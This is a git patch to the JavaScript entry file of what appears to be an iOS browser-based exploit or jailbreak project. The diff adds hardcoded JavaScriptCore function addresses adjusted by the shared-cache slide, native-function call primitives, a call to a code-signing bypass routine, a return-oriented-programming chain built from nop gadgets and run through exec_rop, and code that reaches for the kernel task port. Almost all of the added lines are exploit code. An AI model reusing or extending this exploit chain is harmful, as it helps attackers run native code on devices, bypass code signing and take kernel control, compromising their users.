From b040db45dfc9ef9a902e48bc2718a94cd099f505 Mon Sep 17 00:00:00 2001 From: spv420 Date: Tue, 31 May 2022 19:51:14 -0400 Subject: I live in a constant state of fear and misery Do you miss me anymore? And I don't even notice When it hurts anymore Anymore Anymore Anymore --- src/js/main.js | 93 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++- 1 file changed, 92 insertions(+), 1 deletion(-) (limited to 'src/js/main.js') diff --git a/src/js/main.js b/src/js/main.js index 7021ab1..c6ceba0 100644 --- a/src/js/main.js +++ b/src/js/main.js @@ -19,6 +19,8 @@ var PROT_EXEC = 0x4; var MAP_PRIVATE = 0x2; var MAP_ANON = 0x1000; +var victim = {a: 13.37}; + /* * leftover shit from jsc_fun, used to be using `log` */ @@ -32,6 +34,10 @@ try { puts = function (){}; } +var JSStringCreateWithUTF8CString = 0x239f9d0d; +var JSObjectGetProperty = 0x239fa411; +var JSContextGetGlobalObject = 0x239f8dfd; + function main() { /* * get slide and calculate slid base @@ -48,6 +54,8 @@ function main() { init_sptr_heap(); + scall("printf", "%x %x %x %x", 0x41, 0x42, 0x43, 0x44); + puts("we out here"); puts("I came through a portal holding a 40 and a blunt. Do you really wanna test me right now?"); @@ -56,9 +64,92 @@ function main() { printf("*(uint16_t*)base = 0x%x\n", read_u16(base)); printf("*(uint32_t*)base = 0x%x\n", read_u32(base)); - var tfp0 = get_kernel_task(); + var dyld_shc_slide = get_dyld_shc_slide(); + + sym_cache["JSStringCreateWithUTF8CString"] = JSStringCreateWithUTF8CString + dyld_shc_slide; + sym_cache["JSObjectGetProperty"] = JSObjectGetProperty + dyld_shc_slide; + sym_cache["JSContextGetGlobalObject"] = JSContextGetGlobalObject + dyld_shc_slide; + + prep_shit(); + large_buf[0] = 0x41424344; + printf("%x\n", read_u32(large_buf_ptr)); + + csbypass(); + + return; + + var tfp0 = get_kernel_task(); + printf("tfp0=%x\n", tfp0); + + return; + + printf("dead?\n"); + var string_ref = scall("JSStringCreateWithUTF8CString", sptr("victim")); + printf("dead? %x\n", string_ref); + var global_object = scall("JSContextGetGlobalObject", read_u32(slid + reserve_addr + 0x44)); + printf("dead? %x\n", global_object); + var jsobj_addr = scall("JSObjectGetProperty", read_u32(slid + reserve_addr + 0x44), global_object, string_ref, NULL); + printf("dead?\n"); + + printf("%x\n", jsobj_addr); +// printf("%s\n", hexdump(read_buf(jsobj_addr - 0x100, 0x200), 8, 2, jsobj_addr - 0x100, 8, '0')); + victim.target = parent; + printf("%x\n", read_u32(jsobj_addr + 0x18)); +// printf("%s\n", prim_dump_u32(read_buf(jsobj_addr - 0x10, 0x60), jsobj_addr - 0x10)); +// printf("%s\n", hexdump(read_buf(jsobj_addr - 0x100, 0x200), 8, 2, jsobj_addr - 0x100, 8, '0')); + + /* + UIAlertView *alert = [[UIAlertView alloc] initWithTitle:@"ROFL" + message:@"Dee dee doo doo." + delegate:self + cancelButtonTitle:@"OK" + otherButtonTitles:nil]; + [alert show]; + */ + + return; + + var rop_buf = new Array(); + var nop = (0x781a | 1) + slid; + var zero_arr = [].slice.call(u32_to_u8x4(0)); + var nop_arr = [].slice.call(u32_to_u8x4(nop)); + rop_buf.push(0); + rop_buf.push(0); + rop_buf.push(0); + rop_buf.push(0); + rop_buf.push(0); + rop_buf.push(0); + rop_buf.push(0); + rop_buf.push(nop); + for (var i = 0; i < 0x40000; i++) { + rop_buf.push(0); + rop_buf.push(0); + rop_buf.push(0); + rop_buf.push(0); + rop_buf.push(nop); + if (i % 0x1000 == 0) { + printf("%x\n", i); + } + } + rop_buf.push(0); + rop_buf.push(0); + rop_buf.push(0); + rop_buf.push(0); + rop_buf.push(0x41414141); + + printf("gen'd buf\n"); + +// printf("%s\n", rop_buf[0].toString(16)); + + printf("exec'ing\n"); + exec_rop(rop_buf); + printf("done\n"); + +// var tfp0 = get_kernel_task(); + +// printf("tfp0=%x\n", tfp0); return; -- cgit v1.2.3